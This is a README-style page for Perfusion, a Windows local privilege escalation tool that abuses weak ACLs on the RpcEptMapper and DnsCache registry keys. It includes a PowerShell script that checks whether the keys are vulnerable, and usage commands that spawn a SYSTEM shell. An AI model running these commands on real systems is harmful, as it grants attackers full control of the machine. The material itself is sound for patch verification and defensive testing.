👾 Overview
Windows 7, Windows Server 2008 R2, Windows 8, and Windows Server 2012 ship with weak permissions on the registry keys of the RpcEptMapper and DnsCache services (under HKLM\SYSTEM\CurrentControlSet\Services). Any local user can create a Performance subkey there and register an arbitrary DLL as a performance counter provider; when performance counter data is collected (for example through a WMI query), that DLL is loaded by a process running as NT AUTHORITY\SYSTEM. The result is a local privilege escalation from any user to SYSTEM.
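Before running the exploit it is worth confirming that the target actually has the weak ACL. The following PowerShell snippet is an added example, not part of Perfusion or the original README: it reads the DACL of both service keys and reports whether a low-privileged principal (the list of principals checked is an assumption) is allowed to create subkeys, which is the permission the exploit relies on.

```powershell
# Added example (not Perfusion's own code): check whether the RpcEptMapper and
# Dnscache service keys let low-privileged users create subkeys.
$services = 'RpcEptMapper', 'Dnscache'

# Principals that any local user is a member of (assumed list; extend as needed).
$lowPriv = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    'Everyone'
)

$createSubKey = [System.Security.AccessControl.RegistryRights]::CreateSubKey

foreach ($svc in $services) {
    $path = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"
    if (-not (Test-Path -Path $path)) {
        Write-Output "$svc : key not found"
        continue
    }

    $acl = Get-Acl -Path $path

    # Keep only Allow ACEs for low-privileged principals that include CreateSubKey.
    $weak = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv -contains $_.IdentityReference.Value -and
        (($_.RegistryRights -band $createSubKey) -ne 0)
    }

    if ($weak) {
        Write-Output "$svc : VULNERABLE - low-privileged principal can create subkeys"
        foreach ($ace in $weak) {
            Write-Output ("    {0}: {1}" -f $ace.IdentityReference, $ace.RegistryRights)
        }
    } else {
        Write-Output "$svc : CreateSubKey is not granted to low-privileged principals"
    }

    # A pre-existing Performance subkey may be a leftover from an earlier exploitation attempt.
    if (Test-Path -Path "$path\Performance") {
        Write-Output "    note: $svc\Performance subkey already exists"
    }
}
```

Run it from an unprivileged shell on the target; the ACL itself is readable by everyone, so no elevated rights are required for the check. On a patched or unaffected build, both keys should report that CreateSubKey is not granted to the listed principals.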
💾 Installation
- Clone the repository
- Open the solution in Visual Studio and build it in the Release configuration
⏯️ Usage
The easiest way to use the tool is to launch an interactive system shell.
```powershell
# Use Perfusion to get an interactive shell as NT AUTHORITY\SYSTEM
.\Perfusion.exe -c cmd -i

# On Windows 7 / Windows Server 2008 R2 the Dnscache service key is also vulnerable;
# if the previous command fails, use -k to target that key instead
.\Perfusion.exe -k Dnscache -c cmd -i
```
📝 Resources
| 🔗 Hyperlink | ℹ️ Info |
|---|---|
| Perfusion | Tool to exploit the RpcEptMapper vulnerability |
| PrivescCheck | Windows privilege escalation enumeration script |
| itm4n's Blog | Blog post explaining the RpcEptMapper vulnerability and the development of Perfusion |